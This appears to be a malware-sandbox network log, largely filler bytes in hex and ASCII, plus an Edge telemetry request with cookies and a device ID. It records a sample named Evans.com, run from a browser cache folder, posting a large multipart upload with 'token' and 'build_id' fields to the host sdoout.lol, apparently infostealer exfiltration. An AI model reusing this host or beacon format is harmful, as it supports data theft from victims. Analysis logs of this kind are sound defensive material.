                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:37 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    35192.168.2.55011520.110.205.1194436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:36 UTC1261OUTGET /c.gif?rnd=1735634793756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dc137b0ec0ad4d94aa04f3e0c0cf6381&activityId=dc137b0ec0ad4d94aa04f3e0c0cf6381&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=A917510D236B4283B5F86A7AAE2621DD&MUID=05F9EFDB33DC678B1BFFFABD3256667F HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: c.msn.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=05F9EFDB33DC678B1BFFFABD3256667F; _EDGE_S=F=1&SID=1CCB54C755F762B91E6041A1542B63D6; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:36 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                    ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MUID=05F9EFDB33DC678B1BFFFABD3256667F; domain=.msn.com; expires=Sun, 25-Jan-2026 08:46:36 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: SRM_M=05F9EFDB33DC678B1BFFFABD3256667F; domain=c.msn.com; expires=Sun, 25-Jan-2026 08:46:36 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MR=0; domain=c.msn.com; expires=Tue, 07-Jan-2025 08:46:36 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Tue, 31-Dec-2024 08:56:36 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:35 GMT
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Content-Length: 42
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:36 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    36192.168.2.550120116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----xl6pp8gd2v3ozusj58gl
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 131557
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 78 6c 36 70 70 38 67 64 32 76 33 6f 7a 75 73 6a 35 38 67 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 78 6c 36 70 70 38 67 64 32 76 33 6f 7a 75 73 6a 35 38 67 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 78 6c 36 70 70 38 67 64 32 76 33 6f 7a 75 73 6a 35 38 67 6c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------xl6pp8gd2v3ozusj58glContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------xl6pp8gd2v3ozusj58glContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------xl6pp8gd2v3ozusj58glCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
